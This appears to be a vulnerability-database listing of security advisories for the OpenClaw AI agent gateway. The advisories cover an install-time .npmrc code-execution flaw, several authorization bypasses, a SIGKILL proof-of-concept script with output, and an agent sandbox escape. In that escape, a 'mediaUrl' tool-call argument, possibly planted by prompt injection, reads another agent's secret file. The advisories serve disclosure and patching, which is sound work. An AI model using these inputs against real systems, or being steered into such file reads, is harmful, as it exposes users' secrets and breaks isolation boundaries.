installation-time local command execution / unsafe package-install configuration issue. More precisely: OpenClaw installs local plugin and hook packs by running `npm install --omit=dev --silent --ignore-scripts` inside the staged package directory, see src/infra/install-package-dir.ts:188-199. If that local package directory contains an attacker-controlled .npmrc, npm will still read it. 
If .npmrc overrides npm’s git executable and the package has a git dependency, npm can invoke the attacker-chosen program during install. Who is impacted Users who run: openclaw plugins install <local path/archive> openclaw hooks install <local path/archive> And who install a malicious or untrusted local package that includes: a controlled .npmrc a git dependency a runnable attacker-controlled git target on that platform This should be treated as a security issue, not just “malicious plugin behavior,” because the code execution happens during OpenClaw’s install workflow, before the plugin or hook is ever loaded as trusted runtime code. The important distinction is: A normal “trusted plugin” case is: the operator installs a plugin, enables it, and later that plugin runs with plugin privileges. This issue is different: OpenClaw’s installer executes npm install --omit=dev --silent --ignore-scripts inside an attacker-controlled package directory, and npm still honors attacker-controlled project config from .npmrc. That means an untrusted local plugin or hook package can influence the package manager itself and reach arbitrary program execution at install time, via npm’s git setting and a git dependency, even though --ignore-scripts is present. Why this matters from a security perspective: It is install-time execution, not post-install trusted execution. The execution is triggered by OpenClaw’s installer in src/infra/install-package-dir.ts:188-199. This occurs before the package is accepted as a trusted loaded plugin/hook in the usual sense. It defeats an expected safety boundary. The code explicitly uses --ignore-scripts, which strongly suggests an intent to make installation safer. But the installer still allows attacker-controlled package-manager configuration from .npmrc to affect execution. So the current mitigation is incomplete in a security-relevant way. The dangerous input is part of a supported user flow. 
OpenClaw explicitly supports installing plugins and hook packs from local directories and archives: src/cli/plugins-cli.ts:199-255 src/cli/hooks-cli.ts:573-676 That makes “download a package/archive, then install it” a realistic operator action, not an artificial lab setup. The issue is broader than plugin trust. The problem is not “plugins can do bad things once trusted.” The problem is “the installer consumes attacker-controlled package-manager config before trust is established.” That is much closer to an unsafe install / supply-chain execution flaw than to ordinary trusted-plugin behavior. Hooks are affected too. The same installer path is used for hook packs, not only plugins. So this is a shared install-surface issue, not an isolated plugin-runtime concern. |
CVE-2026-35641
GHSA-m3mh-3mpg-37hw |
| VCID-bumq-54sb-6ua7 | OpenClaw: Mutating internal `/allowlist` chat commands missed `operator.admin` scope enforcement > Fixed in OpenClaw 2026.3.24, the current shipping release. **Title** Mutating internal `/allowlist` chat commands missed `operator.admin` scope enforcement **CWE** CWE-862 Missing Authorization **CVSS v3.1** CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N Base score: **6.5 (Medium)** **Severity Assessment** Medium. This is a real authorization flaw in OpenClaw’s internal control plane. The issue does not require host access, trusted local state tampering, or multi-tenant assumptions, but exploitation does require an already authenticated internal Gateway caller with `operator.write`. **Impact** An authenticated internal Gateway caller limited to `operator.write` can perform state-changing `/allowlist` actions without `operator.admin`, even though comparable mutating internal chat commands already require `operator.admin`. The reachable effects are persistent changes to config-backed `allowFrom` entries and pairing-store-backed allowlist entries. This is not a semantic-modeling complaint and not a generic “trusted operator can do things” claim. It is a missing authorization check inside OpenClaw’s own internal scope model, where peer mutating command surfaces already distinguish `operator.write` from `operator.admin`. **Affected Component** Verified against the latest published GitHub release tag `v2026.3.23` (`ccfeecb6887cd97937e33a71877ad512741e82b2`), published `2026-03-23T23:15:50Z`. Exact vulnerable path on the shipped tag: - `src/auto-reply/reply/commands-allowlist.ts:251-254` - `/allowlist` authorization uses only `rejectUnauthorizedCommand(...)`. - `src/auto-reply/reply/commands-allowlist.ts:386-524` - mutating config and pairing-store writes happen here, but there is no `requireGatewayClientScopeForInternalChannel(..., operator.admin, ...)`. 
Reachability and scope model: - `src/gateway/method-scopes.ts:94-109` - `chat.send` is a write-scoped method. - `src/gateway/server.chat.gateway-server-chat.test.ts:539-559` - existing runtime coverage proves `chat.send` routes slash commands without an agent run. - `src/auto-reply/command-auth.ts:574-577` - internal callers become `senderIsOwner` only when `GatewayClientScopes` includes `operator.admin`. Comparable internal mutating command paths already enforce `operator.admin`: - `src/auto-reply/reply/commands-config.ts:64-73` - `src/auto-reply/reply/commands-mcp.ts:89-96` - `src/auto-reply/reply/commands-plugins.ts:387-394` - `src/auto-reply/reply/commands-acp.ts:98-106` Version history: - Introduced by commit `555b2578a8cc6e1b93f717496935ead97bfbed8b` (`feat: add /allowlist command`) - Earliest released affected tag found: `v2026.1.20` - Latest released affected tag verified: `v2026.3.23` **Technical Reproduction** 1. Check out the shipped release tag `v2026.3.23`. 2. Use an internal command context with: - `Provider = "webchat"` - `Surface = "webchat"` - `GatewayClientScopes = ["operator.write"]` - `params.command.channel = "webchat"` 3. Route a slash command through `chat.send`. 4. Execute either of these mutating commands: - `/allowlist add dm channel=telegram 789` - `/allowlist add dm --store channel=telegram 789` 5. Confirm the command context is authorized but not owner-equivalent: - `isAuthorizedSender === true` - `senderIsOwner === false` 6. Observe that the commands still succeed and perform persistent writes. **Demonstrated Impact** The vulnerable handler performs real state mutation for a low-scope internal caller: - Config-backed mutation path: - `src/auto-reply/reply/commands-allowlist.ts:398-503` - reads the config snapshot, applies the edit, validates, and writes the updated config to disk. 
- Store-backed mutation path: - `src/auto-reply/reply/commands-allowlist.ts:479-485` - `src/auto-reply/reply/commands-allowlist.ts:513-518` - updates the pairing-store allowlist without any admin-scope gate. The result is successful persistence, not just a misleading success message. **Environment** - Product: OpenClaw - Verified shipped tag: `v2026.3.23` - Shipped tag commit: `ccfeecb6887cd97937e33a71877ad512741e82b2` - Published GitHub release time: `2026-03-23T23:15:50Z` - Verification date: `2026-03-24` **Duplicate Check** This is not a duplicate of: - `GHSA-pjvx-rx66-r3fg` - that advisory covered cross-account scoping in `/allowlist ... --store`, not missing internal `operator.admin` enforcement. - `GHSA-hfpr-jhpq-x4rm` - that advisory covered `/config` writes through `chat.send`, not `/allowlist`. - `GHSA-3w6x-gv34-mqpf` - same authorization class, but different command path (`/acp`, not `/allowlist`). **In Scope Check** This report is in scope under `SECURITY.md` because: - it does **not** rely on adversarial operators sharing one gateway host or config; - it does **not** target the HTTP compatibility endpoints that `SECURITY.md` explicitly treats as full operator-access surfaces; - it demonstrates a real authorization mismatch inside OpenClaw’s own internal control-plane scope model (`operator.write` vs `operator.admin`); - peer mutating internal chat commands already enforce `operator.admin`, so this is not a request for a new boundary but a missing check on an existing one. This is therefore a concrete authorization bug, not a trusted-operator hardening suggestion. **Remediation Advice** 1. Add `requireGatewayClientScopeForInternalChannel(..., allowedScopes: ["operator.admin"], ...)` to the mutating internal `/allowlist` paths. 2. Add regression coverage for both mutation modes: - internal `operator.write` must be rejected; - internal `operator.admin` must be allowed. 3. Cover both config-backed and store-backed writes. 4. 
Audit other mutating internal chat-command paths for the same missing-scope pattern. |
GHSA-vqvg-86cc-cg83
|
| VCID-cvxu-rdbu-abd2 | OpenClaw has incomplete Fix for CVE-2026-27486: Unvalidated SIGKILL in `!stop` Chat Command via `shell-utils.ts` > Fixed in OpenClaw 2026.3.24, the current shipping release. ### Advisory Details **Title**: Incomplete Fix for CVE-2026-27486: Unvalidated SIGKILL in `!stop` Chat Command via `shell-utils.ts` **Description**: ### Summary The `!stop` (and `/bash stop`) chat command kills background bash processes using `SIGKILL` directly, without first sending `SIGTERM` to allow graceful shutdown. This is because `bash-command.ts` imports `killProcessTree()` from `src/agents/shell-utils.ts`, which still contains the pre-CVE-2026-27486 aggressive kill logic, rather than from the patched `src/process/kill-tree.ts`. ### Details CVE-2026-27486 fixed unsafe process termination by introducing a graceful shutdown sequence in `src/process/kill-tree.ts` — sending `SIGTERM` first, waiting a configurable grace period (default 3 seconds), then escalating to `SIGKILL` only if the process is still alive. However, an identical copy of the **unpatched** `killProcessTree` function remains in `src/agents/shell-utils.ts` (lines 170–192). This function sends `SIGKILL` immediately with no `SIGTERM`: ```typescript // src/agents/shell-utils.ts:170-192 export function killProcessTree(pid: number): void { // ... Windows handling ... try { process.kill(-pid, "SIGKILL"); // Immediate hard kill, no SIGTERM } catch { try { process.kill(pid, "SIGKILL"); } catch { // process already dead } } } ``` The `!stop` chat command handler in `src/auto-reply/reply/bash-command.ts` imports and calls this vulnerable version at line 302: ```typescript // src/auto-reply/reply/bash-command.ts:5 import { killProcessTree } from "../../agents/shell-utils.js"; // src/auto-reply/reply/bash-command.ts:300-304 const pid = running.pid ?? 
running.child?.pid; if (pid) { killProcessTree(pid); // Calls the UNPATCHED version } markExited(running, null, "SIGKILL", "failed"); ``` Compare this to the patched version in `src/process/kill-tree.ts`: ```typescript // src/process/kill-tree.ts:46-78 function killProcessTreeUnix(pid: number, graceMs: number): void { // Step 1: Try graceful SIGTERM to process group try { process.kill(-pid, "SIGTERM"); } catch { /* ... */ } // Step 2: Wait grace period, then SIGKILL if still alive setTimeout(() => { if (isProcessAlive(-pid)) { try { process.kill(-pid, "SIGKILL"); } catch { /* ... */ } } }, graceMs).unref(); } ``` ### PoC This PoC demonstrates the difference between the vulnerable and patched code paths inside a running OpenClaw Gateway container. **Setup:** ```bash # Build and start the gateway container cd CVE-2026-27486-variant-exp/ docker compose up -d sleep 5 ``` **Exploit (vulnerable `killProcessTree` from `shell-utils.ts`):** The following script is injected into the container and executed. 
It starts a bash process that traps `SIGTERM` for graceful shutdown, then kills it using the same code path as `!stop`: ```javascript // exploit_sigkill.cjs — replicates src/agents/shell-utils.ts:183-190 const { spawn } = require('child_process'); const fs = require('fs'); try { fs.unlinkSync('/tmp/graceful_shutdown.txt'); } catch {} const child = spawn('/bin/bash', ['-c', 'trap \'echo GRACEFUL_SHUTDOWN > /tmp/graceful_shutdown.txt; exit 0\' SIGTERM; while true; do sleep 1; done' ], { detached: true, stdio: 'ignore' }); child.unref(); setTimeout(() => { // VULNERABLE: same as shell-utils.ts — SIGKILL only try { process.kill(-child.pid, 'SIGKILL'); } catch { try { process.kill(child.pid, 'SIGKILL'); } catch {} } setTimeout(() => { if (fs.existsSync('/tmp/graceful_shutdown.txt')) { console.log('[BLOCKED] SIGTERM was received.'); process.exit(1); } else { console.log('[EXPLOITED] SIGKILL sent directly — SIGTERM never delivered.'); process.exit(0); } }, 2000); }, 1000); ``` **Run:** ```bash python3 poc_exploit.py ``` ### Log of Evidence **Exploit output (SIGKILL only, no graceful shutdown):** ``` [*] Running exploit (vulnerable killProcessTree from shell-utils.ts)... [*] Victim PID: 78 [*] Calling vulnerable killProcessTree (SIGKILL only, no SIGTERM)... [EXPLOITED] SIGKILL sent directly — SIGTERM never delivered. [EXPLOITED] Graceful shutdown handler was NEVER invoked. [SUCCESS] CVE-2026-27486 variant confirmed: killProcessTree() in shell-utils.ts sends immediate SIGKILL, bypassing the graceful shutdown fix in process/kill-tree.ts. ``` **Control output (SIGTERM first, graceful shutdown works):** ``` [*] Running control (patched killProcessTree from process/kill-tree.ts)... [*] Victim PID: 93 [*] Calling patched killProcessTree (SIGTERM first, then SIGKILL after grace)... [NORMAL] SIGTERM received — graceful shutdown completed. 
Flag: GRACEFUL_SHUTDOWN [NORMAL] Control confirmed: patched killProcessTree sends SIGTERM first, allowing graceful shutdown before escalating to SIGKILL. ``` ### Impact When `!stop` is used, background processes are killed instantly via `SIGKILL` with no chance to perform cleanup. This can result in: - **Data corruption**: processes writing to files or databases are interrupted mid-write - **Resource leaks**: temporary files, lock files, and network connections are not properly released - **Security-sensitive cleanup skipped**: operations like erasing in-memory secrets or completing audit logs are bypassed This is the same class of impact that CVE-2026-27486 was filed for — the fix simply missed the `shell-utils.ts` copy of the function. ### Affected products - **Ecosystem**: npm - **Package name**: openclaw - **Affected versions**: <= 2026.3.14 - **Patched versions**: <None> ### Severity - **Severity**: Medium - **Vector string**: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H ### Weaknesses - **CWE**: CWE-404: Improper Resource Shutdown or Release ### Occurrences | Permalink | Description | | :--- | :--- | | [https://github.com/moltbot/moltbot/blob/f2849c2417/src/agents/shell-utils.ts#L170-L192](https://github.com/moltbot/moltbot/blob/f2849c2417/src/agents/shell-utils.ts#L170-L192) | The vulnerable `killProcessTree` function that sends immediate `SIGKILL` without `SIGTERM`. | | [https://github.com/moltbot/moltbot/blob/f2849c2417/src/auto-reply/reply/bash-command.ts#L5](https://github.com/moltbot/moltbot/blob/f2849c2417/src/auto-reply/reply/bash-command.ts#L5) | Import statement pulling the vulnerable `killProcessTree` from `shell-utils.ts` instead of the patched `kill-tree.ts`. | | [https://github.com/moltbot/moltbot/blob/f2849c2417/src/auto-reply/reply/bash-command.ts#L300-L304](https://github.com/moltbot/moltbot/blob/f2849c2417/src/auto-reply/reply/bash-command.ts#L300-L304) | The `!stop` handler calling the vulnerable `killProcessTree(pid)`. 
| | [https://github.com/moltbot/moltbot/blob/f2849c2417/src/process/kill-tree.ts#L46-L78](https://github.com/moltbot/moltbot/blob/f2849c2417/src/process/kill-tree.ts#L46-L78) | The **patched** `killProcessTreeUnix` with graceful `SIGTERM` → grace period → `SIGKILL` sequence (for reference). | |
CVE-2026-35667
GHSA-3298-56p6-rpw2 |
| VCID-d3qp-5wm9-aqfp | OpenClaw has Sandbox Media Root Bypass via Unnormalized `mediaUrl` / `fileUrl` Parameter Keys (CWE-22) > Fixed in OpenClaw 2026.3.24, the current shipping release. ### Advisory Details **Title**: Sandbox Media Root Bypass via Unnormalized `mediaUrl` / `fileUrl` Parameter Keys (CWE-22) **Description**: ### Summary A path traversal vulnerability in the agent sandbox enforcement allows a sandboxed agent to read arbitrary files from other agents' workspaces by using the `mediaUrl` or `fileUrl` parameter key in message tool calls. The `normalizeSandboxMediaParams` function only checks `["media", "path", "filePath"]` keys, while `mediaUrl` and `fileUrl` escape normalization entirely. Combined with `handlePluginAction` dropping `mediaLocalRoots` from the dispatch context, this enables a full sandbox escape where any agent can read files outside its designated sandbox root. ### Details The vulnerability exists in two files within the messaging pipeline: **1. Incomplete parameter key coverage in `normalizeSandboxMediaParams`:** In `src/infra/outbound/message-action-params.ts`, the function iterates over a hardcoded allowlist of parameter keys to validate: ```typescript // Line 212 const mediaKeys: Array<"media" | "path" | "filePath"> = ["media", "path", "filePath"]; ``` The `mediaUrl` and `fileUrl` parameter keys are not included in this array. These keys are actively used by multiple channel extensions (Discord, Telegram, Slack, Matrix, Twitch) for media attachment handling, but they completely bypass the sandbox path validation performed by `resolveSandboxedMediaSource`. **2. Dropped `mediaLocalRoots` in `handlePluginAction`:** In `src/infra/outbound/message-action-runner.ts`, the `handlePluginAction` function dispatches actions to channel plugins but omits `mediaLocalRoots` from the context: ```typescript // Lines 684-697 const handled = await dispatchChannelMessageAction({ channel, action, cfg, params, accountId: accountId ?? 
undefined, requesterSenderId: input.requesterSenderId ?? undefined, sessionKey: input.sessionKey, sessionId: input.sessionId, agentId, gateway, toolContext: input.toolContext, dryRun, // mediaLocalRoots is MISSING here }); ``` Despite `ChannelMessageActionContext` defining `mediaLocalRoots?: readonly string[]` (in `src/channels/plugins/types.core.ts` line 478), plugins receive `undefined` and fall back to `getDefaultMediaLocalRoots()`, which permits reads of the entire `~/.openclaw/` directory tree — including all agents' workspaces. **Attack chain:** 1. A sandboxed agent (Agent-A at `~/.openclaw/workspace/agent-a/`) calls the message tool with `{ mediaUrl: "~/.openclaw/workspace/agent-b/secret.txt" }` 2. `normalizeSandboxMediaParams` skips the `mediaUrl` key (not in allowlist) 3. `handlePluginAction` dispatches without `mediaLocalRoots` 4. Plugin calls `loadWebMedia` with default roots, which allows `~/.openclaw/workspace/**` 5. Agent-B's secret file content is read and sent as a channel attachment ### PoC **Prerequisites:** - Docker installed - OpenClaw Docker image built (`openclaw-gateway:latest`) **Steps:** 1. Start the vulnerable gateway container: ```bash cd llm-enhance/cve-finding/Path_Traversal/CVE-2026-27522-Media_Root_Bypass-variant-exp/ docker compose up -d sleep 5 ``` 2. Run the exploit: ```bash python3 poc_exploit.py ``` 3. The exploit writes a secret file to `~/.openclaw/workspace/agent-b/secret_key.txt` inside the container, then invokes `normalizeSandboxMediaParams` with Agent-A's sandbox policy and `{ mediaUrl: <agent-b-secret-path> }`. The `mediaUrl` key bypasses normalization, and `loadWebMedia` reads the file successfully. 4. Run the control experiment to confirm sandbox works for checked keys: ```bash python3 control-sandbox_enforced.py ``` ### Log of Evidence **Exploit output:** ``` === CVE-2026-27522 Variant: Sandbox Media Root Bypass === [*] Container 'openclaw-media-bypass-test' is running [*] Running exploit script with Bun... 
[VULNERABLE] mediaUrl bypassed normalizeSandboxMediaParams! Agent-A sandboxRoot: /root/.openclaw/workspace/agent-a mediaUrl targets Agent-B: /root/.openclaw/workspace/agent-b/secret_key.txt args after normalization: {"mediaUrl":"/root/.openclaw/workspace/agent-b/secret_key.txt"} [EXPLOITED] Agent-B secret file content: AGENT-B-SECRET-API-KEY-sk-12345abcdef === EXPLOIT SUCCESSFUL === Agent-A read Agent-B's secret file via mediaUrl, bypassing sandbox. [+] RESULT: VULNERABLE — mediaUrl bypasses sandbox enforcement ``` **Control experiment output:** ``` === Control Experiment: Sandbox Enforcement for 'media' Key === [*] Container 'openclaw-media-bypass-test' is running [*] Running control script with Bun... [SAFE] normalizeSandboxMediaParams blocked 'media' key as expected! Error: Path escapes sandbox root (/tmp/sandbox-ZKvGQX): /tmp/victim-2cuAOO/secret.txt === CONTROL EXPERIMENT PASSED === The 'media' parameter IS correctly checked by sandbox enforcement. Only unchecked keys (mediaUrl, fileUrl) bypass the sandbox. [+] CONTROL PASSED: 'media' key is correctly enforced by sandbox ``` ### Impact This is a **sandbox escape** vulnerability. An attacker who can influence an agent's tool calls (via prompt injection, multi-agent interaction, or malicious plugin instruction) can read arbitrary files from other agents' workspaces. This includes: - API keys and secrets stored in other agents' sandboxes - Session data and conversation logs - Configuration files with sensitive credentials - Any file within the `~/.openclaw/` directory tree This completely defeats the purpose of the multi-agent sandbox isolation feature, which is documented as a security boundary in the project's Docker and sandboxing documentation. 
### Affected products - **Ecosystem**: npm - **Package name**: openclaw - **Affected versions**: <= 2026.3.14 (current latest) - **Patched versions**: <None> ### Severity - **Severity**: High - **Vector string**: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N ### Weaknesses - **CWE**: CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') ### Occurrences | Permalink | Description | | :--- | :--- | | [https://github.com/moltbot/moltbot/blob/main/src/infra/outbound/message-action-params.ts#L206-L227](https://github.com/moltbot/moltbot/blob/main/src/infra/outbound/message-action-params.ts#L206-L227) | The `normalizeSandboxMediaParams` function with incomplete `mediaKeys` allowlist — `mediaUrl` and `fileUrl` are not checked. | | [https://github.com/moltbot/moltbot/blob/main/src/infra/outbound/message-action-runner.ts#L684-L697](https://github.com/moltbot/moltbot/blob/main/src/infra/outbound/message-action-runner.ts#L684-L697) | The `handlePluginAction` dispatch call that omits `mediaLocalRoots` from the context passed to `dispatchChannelMessageAction`. | | [https://github.com/moltbot/moltbot/blob/main/src/channels/plugins/types.core.ts#L478](https://github.com/moltbot/moltbot/blob/main/src/channels/plugins/types.core.ts#L478) | The `ChannelMessageActionContext` type that defines `mediaLocalRoots` but never receives it from `handlePluginAction`. | |
CVE-2026-35668
GHSA-hr5v-j9h9-xjhg |
| VCID-j96c-kau3-7fag | OpenClaw: Non-owner command-authorized sender can change the owner-only `/send` session delivery policy > Fixed in OpenClaw 2026.3.24, the current shipping release. **Title** Non-owner command-authorized sender can change the owner-only `/send` session delivery policy **CWE** CWE-285 Improper Authorization **CVSS v3.1** CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L Base score: **5.4 (Medium)** **Severity Assessment** Medium. This is a real owner-only authorization bypass, but the demonstrated impact is limited to persistent mutation of the current session’s delivery policy rather than direct code execution, sandbox escape, or cross-host compromise. **Impact** A non-owner sender who is allowed to run commands can invoke `/send on|off|inherit` and persistently change the current session’s `sendPolicy`, even though OpenClaw documents `/send` as owner-only. That lets a lower-trust participant: - disable reply delivery for the current session (`/send off`), suppressing future replies in that chat; - re-enable reply delivery (`/send on`) after the owner intentionally disabled it; - remove the session override (`/send inherit`). **Affected Component** Verified against the latest published GitHub release tag `v2026.3.23` (`ccfeecb6887cd97937e33a71877ad512741e82b2`), published `2026-03-23T23:15:50Z`. Exact vulnerable path on the shipped tag: - `src/auto-reply/reply/commands-session.ts:212-239` - `handleSendPolicyCommand(...)` checks only `params.command.isAuthorizedSender`. - when true, it mutates `params.sessionEntry.sendPolicy` and persists the session entry. Authorization behavior that makes this reachable: - `src/auto-reply/command-auth.ts:401-407` - `senderIsOwner` is computed separately from general command authorization. - `src/auto-reply/command-auth.ts:420-429` - command authorization can succeed even when `senderIsOwner === false`. 
- `src/auto-reply/command-auth.owner-default.test.ts:10-47` - existing coverage confirms a sender can be command-authorized while not treated as owner. Documented owner-only contract: - `docs/tools/slash-commands.md:112` - `/send on|off|inherit` is documented as owner-only. - `docs/concepts/session-tool.md:156` - `sendPolicy` is documented as settable via `sessions.patch` or owner-only `/send on|off|inherit`. Related privilege model: - `src/gateway/method-scopes.ts:131-133` - `sessions.patch` is admin-scoped, which reinforces that session-delivery-policy mutation is treated as privileged state. Version history: - The vulnerable handler exists in release history going back at least to commit `ea018a68ccb92dbc735bc1df9880d5c95c63ca35` (`refactor(auto-reply): split reply pipeline`). - Earliest released affected tag found: `v2026.1.14-1` - Latest released affected tag verified: `v2026.3.23` **Technical Reproduction** 1. Check out the shipped release tag `v2026.3.23`. 2. Configure a channel where: - a non-owner sender is allowed to run commands, for example through `commands.allowFrom`; - the owner identity is distinct, for example via `commands.ownerAllowFrom`. 3. Start or reuse a session with a live `sessionEntry` and `sessionStore`. 4. Send `/send off` as the non-owner but command-authorized sender. 5. Confirm the resolved command context has: - `isAuthorizedSender === true` - `senderIsOwner === false` 6. Observe that the handler still accepts the command, mutates `sessionEntry.sendPolicy`, and persists the session entry. **Demonstrated Impact** The vulnerable handler performs a real persistent session-state change: - `src/auto-reply/reply/commands-session.ts:232-238` - `/send inherit` deletes `sessionEntry.sendPolicy` - other modes assign `sessionEntry.sendPolicy = sendPolicyCommand.mode` - the handler then calls `persistSessionEntry(params)` The mutation is not gated by owner status, only by general command authorization. 
That changes subsequent delivery behavior for the current session, which matches the documented meaning of `sendPolicy`. **Environment** - Product: OpenClaw - Verified shipped tag: `v2026.3.23` - Shipped tag commit: `ccfeecb6887cd97937e33a71877ad512741e82b2` - Published GitHub release time: `2026-03-23T23:15:50Z` - Verification date: `2026-03-24` **Duplicate Check** Upon inspection there is no preexisting GHSA for `/send`. This is distinct from: - `GHSA-r7vr-gr74-94p8` - that advisory covered owner-only authorization bypasses for `/config` and `/debug`, not `/send`. This is the same authorization class, but a different privileged command surface that still lacks the owner check. **In Scope Check** This report is in scope under `SECURITY.md` because: - it does **not** rely on adversarial operators sharing one gateway host or config; - it does **not** rely on trusted local state tampering; - `SECURITY.md:151-152` explicitly says non-owner sender status matters for owner-only tools and commands; - `/send` is explicitly documented as owner-only, so this is a direct owner-only authorization bypass, not a complaint about normal shared-agent steering. This is therefore a concrete authorization flaw against a documented product boundary. **Remediation Advice** 1. Change `/send` to require owner status, not just command authorization. 2. Reuse the same owner-only rejection pattern already used by privileged command surfaces such as `/config`, `/debug`, and owner-only `/plugins` writes. 3. Add regression coverage for the exact case where: - a non-owner sender is command-authorized; - `/send` must still be rejected unless `senderIsOwner === true`. 4. Verify that the owner can still use `/send on|off|inherit` normally. |
CVE-2026-35620
GHSA-39mp-545q-w789 |
| VCID-jhah-j2td-t3dp | OpenClaw Has Incomplete Fix for CVE-2026-4039: CLI Backend Environment Variable Injection via Workspace Config ## Summary Incomplete Fix for CVE-2026-4039: CLI Backend Environment Variable Injection via Workspace Config ## Current Maintainer Triage - Status: open - Normalized severity: high - Assessment: Real shipped malicious-workspace-config env injection in the CLI backend runner, fixed by sanitizing backend env before spawn and shipped in v2026.3.24, so advisory stays open until published. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.23-2` - Patched versions: `>= 2026.3.24` - First stable tag containing the fix: `v2026.3.24` ## Fix Commit(s) - `c2fb7f1948c3226732a630256b5179a60664ec24` — 2026-03-24T12:58:10-07:00 ## Release Process Note - The fix is already present in released version `2026.3.24`. - This draft looks ready for final maintainer disposition or publication, not additional code-fix work. Thanks @YLChen-007 for reporting. |
CVE-2026-41384
GHSA-vfw7-6rhc-6xxg |
| VCID-nfva-pukn-uqch | OpenClaw has a Gateway HTTP /v1/models Route Bypasses Operator Read Scope > Fixed in OpenClaw 2026.3.24, the current shipping release. ## Summary The OpenAI-compatible HTTP endpoint `/v1/models` accepts bearer auth but does not enforce operator method scopes. In contrast, the WebSocket RPC path enforces `operator.read` for `models.list`. A caller connected with `operator.approvals` (no read scope) is rejected for `models.list` (`missing scope: operator.read`) but can still enumerate model metadata through HTTP `/v1/models`. Confirmed on current `main` at commit `06de515b6c42816b62ec752e1c221cab67b38501`. ## Details The WS control-plane path enforces role/scope checks centrally before dispatching methods. For non-admin operators, this includes required method scopes such as `operator.read` for `models.list`. The HTTP compatibility path for `/v1/models` performs bearer authorization and then returns model metadata; it does not apply an equivalent scope check. As reproduced, a caller with only `operator.approvals` can: 1. connect successfully, 2. fail `models.list` over WS with `missing scope: operator.read`, 3. fetch `/v1/models` over HTTP with status 200 and model data. This is a cross-surface authorization inconsistency where the stricter WS policy can be bypassed via HTTP. ## Impact - Callers lacking `operator.read` can still enumerate gateway model metadata through HTTP compatibility routes. - Breaks scope model consistency between WS RPC and HTTP surfaces. - Weakens least-privilege expectations for operators granted non-read scopes. ## Patch Suggestion ### 1) Enforce read scope on `/v1/models` routes Apply a scope gate equivalent to `models.list` before serving `/v1/models` or `/v1/models/:id`. ### 2) Reuse centralized scope-authorization helper for HTTP compatibility endpoints Use the same operator scope logic used by WS dispatch (`authorizeOperatorScopesForMethod(...)`) to prevent policy drift. 
### 3) Add regression tests Keep this PoC and add explicit negative/positive controls: - `operator.approvals` without read is rejected on HTTP `/v1/models`. - `operator.read` is accepted on both WS `models.list` and HTTP `/v1/models`. ## Credit Reported by @zpbrent. |
CVE-2026-35619
GHSA-68f8-9mhj-h2mp |
| VCID-pa1f-qzsh-efa9 | OpenClaw: Gateway operator.write Can Reach Admin-Class Channel Allowlist Persistence via chat.send > Fixed in OpenClaw 2026.3.24, the current shipping release. ## Summary The shared `/allowlist` command persists channel authorization config through `writeConfigFile(...)` but does not re-validate gateway client scopes for internal gateway callers. Because `chat.send` is intentionally reachable to `operator.write` callers and still creates a generic command-authorized internal context, an authenticated write-scoped gateway client can indirectly mutate channel `allowFrom` and `groupAllowFrom` policy that direct `config.patch` correctly reserves to `operator.admin`. This is not just a generic code smell. The current code already shows the intended boundary by adding sink-side internal admin checks to shared `/config` and `/plugins` writes, but `/allowlist` was left behind. ## Details The gateway's documented scope split is clear: - `chat.send` is a write-scoped action. - direct config mutation is an admin-scoped action. The vulnerable path is: 1. A gateway client authenticates with `operator.write`. 2. The client calls `chat.send`, which is intentionally allowed for that scope. 3. `chat.send` builds an internal message context with `CommandAuthorized: true` and carries `GatewayClientScopes` into the reply pipeline. 4. `resolveCommandAuthorization(...)` converts that internal message into `isAuthorizedSender=true` in the common case where no stricter `commands.allowFrom` override is configured. 5. `/allowlist add|remove` accepts that generic command authorization and proceeds into its config-backed edit path. 6. The handler clones the parsed config, calls `plugin.allowlist.applyConfigEdit(...)`, validates the result, and persists it with `writeConfigFile(validated.config)`. 7. No sink-side check requires `operator.admin` before the persistent write occurs. 
That creates a direct control-plane mismatch: - `config.patch` rejects the same caller with `missing scope: operator.admin`. - `/allowlist add dm ...` or `/allowlist add group ...` reached through `chat.send` can still rewrite channel authorization state. ## Impact - A gateway client intentionally limited to `operator.write` can persist first-party channel authorization policy. - The caller can widen DM or group allowlists for channels using the shared `/allowlist` plumbing. - This weakens the repo's documented control-plane privilege split between ordinary write actions and admin-only persistent authorization mutation. ## Remediation ### 1) Add the Missing Sink-Side Internal Admin Check to `/allowlist` Mirror the existing hardened pattern from `/config` and `/plugins`. Before any config-backed `/allowlist add|remove` write, require: - `operator.admin` for internal gateway channels This should happen before `plugin.allowlist.applyConfigEdit(...)` and before `writeConfigFile(...)`. ### 2) Keep Pairing-Store and Config-Write Policy Checks, but Do Not Treat Them as Scope Enforcement `configWrites` policy and pairing-store behavior are useful secondary controls, but they do not replace the missing privilege check between `operator.write` and `operator.admin`. |
CVE-2026-35621
GHSA-94pw-c6m8-p9p9 |